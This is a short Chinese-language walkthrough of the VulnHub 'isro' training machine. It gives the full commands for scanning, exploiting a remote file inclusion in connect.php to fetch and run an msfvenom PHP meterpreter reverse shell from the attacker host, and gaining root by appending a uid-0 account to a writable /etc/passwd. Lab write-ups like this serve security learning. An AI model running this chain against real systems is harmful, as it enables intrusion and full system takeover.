本周实践的是vulnhub的isro镜像,下载地址,https://download.vulnhub.com/ha/isro.zip,
首先做地址扫描,sudo netdiscover -r 192.168.137.0/24,
接着做端口扫描,sudo nmap -sS -sV -T4 -A -p- 192.168.137.80,
再来个目录文件爆破,sudo dirb http://192.168.137.80 -X .php,.txt,.zip,.html,
这个地方直接猜测http://192.168.137.80/connect.php有文件包含漏洞,一试还真有,案理说不该这么直接猜的,应该拿web漏洞扫描器扫出来,
不管这么多了,总之就是要利用这个漏洞,
在kali攻击机上做一个反弹shell脚本,
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.137.194 LPORT=4444 R > shell.php,
在kali攻击机上开启web文件下载服务,python -m SimpleHTTPServer,
在kali攻击机上开一个meterpretershell监听,
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.137.194
exploit
这就可以通过访问http://192.168.137.80/connect.php?file=http://192.168.137.194:8000/shell.php来制造反弹shell,
拿到meterpreter反弹shell后getuid查看,不是root,还需要继续提权,
先转成交互式的shell,
shell,python3 -c 'import pty;pty.spawn("/bin/bash")',
查看/etc/passwd,ls -la /etc/passwd,发现当前账户可写,
那就有招了,可以制作一个账户密码填进去,hacker/password,
制作密码,perl -le 'print crypt("password","salt")',
填到/etc/passwd里,echo "hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash" >> /etc/passwd,
再切换账户,su hacker,再id查看,获取root权限完成,
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论